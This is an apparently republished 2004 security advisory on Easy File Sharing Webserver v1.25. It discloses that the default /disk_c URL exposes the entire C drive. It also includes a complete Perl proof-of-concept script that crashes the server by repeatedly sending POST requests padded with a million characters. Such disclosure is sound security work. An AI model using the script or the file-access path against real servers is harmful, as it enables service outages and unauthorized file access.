Latest news
GulfTech Security Research August, 24th 2004
Vendor : EFS Software Inc.
URL : http://www.sharing-file.com
Version : Easy File Sharing Webserver v1.25
Risk : Unauthorized System Access && DoS
Description:
Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.). It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum.
Unauthorized System Access:
The authorization function used by EFS Webserver is supposed to keep just anyone from being able to access your files. But this is not the case and an attacker has read access to the entire hard drive by default.
http://127.0.0.1/disk_c
This url will give an attacker read access to the entire C drive. The issue is exploited by requesting the name of a virtual folder on the server. (disk_c is there by default)
Denial of Service:
Easy File Sharing Web Server can be DoS'ed and even remotely crashed by sending a number of large HTTP requests to the web server. The CPU usage goes up to 99% and in some cases crash. Attached is a Proof Of Concept script for this issue.
Solution:
The developers were contacted but never responded to my emails
Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00045-08242004
Credits:
James Bercegay of the GulfTech Security Research Team
["efswsdos.pl" (application/octet-stream)]
#!/usr/bin/perl
#####################################################
# Easy File Sharing Webserver v1.25 Denial Of Service
# Proof Of Concept Code By GulfTech Security Research
#####################################################
# Easy File Sharing Webserver v1.25 will consume 99%
# of CPU usage until it crashes when sent large req's
#####################################################
use IO::Socket;
print "=====================================================\n".
" Easy File Sharing Webserver v1.25 Denial Of Service \n".
"=====================================================\n";
unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); }
my $remote_host = $ARGV[0];
my $remote_port = $ARGV[1];
my $done = "\015\012\015\012";
my $buff = "A" x 1000000;
my $post = "POST /".$buff." HTTP/1.0 ".$done;
print "[*] DoS'ing Server $remote_host Press ctrl+c to stop\n";
while ($post) {
for (my $i=1; $i<10; $i++) {
my $i = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $remote_host,
PeerPort => $remote_port,
Timeout => '10000',
Type => SOCK_STREAM,
) || die("[*] Server Is Dead!");
print $i $post;
$i->autoflush(1);
}
}
close $i;
Spotlight

Is it time to professionalize information security?
Posted on 23 May 2013. | The issue of whether or not information security professionals should be licensed to practice has already been the topic of many a passionate debate.

Review: Logging and Log Management
Posted on 22 May 2013. | Every security practitioner should be aware of the overwhelming advantages of logging and perusing logs for discovering system intrusions. But logging and log management comes with its own set of difficulties.

Experts highlight top data breach vulnerabilities
Posted on 22 May 2013. | Hidden vulnerabilities lie in everyday activities that can expose personal information and lead to data breach, including buying gas with a credit card or wearing a pacemaker.

A closer look at Mega cloud storage
Posted on 21 May 2013. | Once a novelty, nowadays many cloud storage services are fighting for their piece of the market in the virtual world. Mega offers 50GB of free space with great pricing on Pro accounts.

The CSO perspective on healthcare security and compliance
Posted on 20 May 2013. | Randall Gamby is the CSO of the Medicaid Information Service Center of New York. In this interview he discusses healthcare security and compliance challenges and offers a variety of tips.
By subscribing to our early morning news update, you will receive a daily digest of the latest security news published on Help Net Security.
With over 500 issues so far, reading our newsletter every Monday morning will keep you up-to-date with security risks out there.





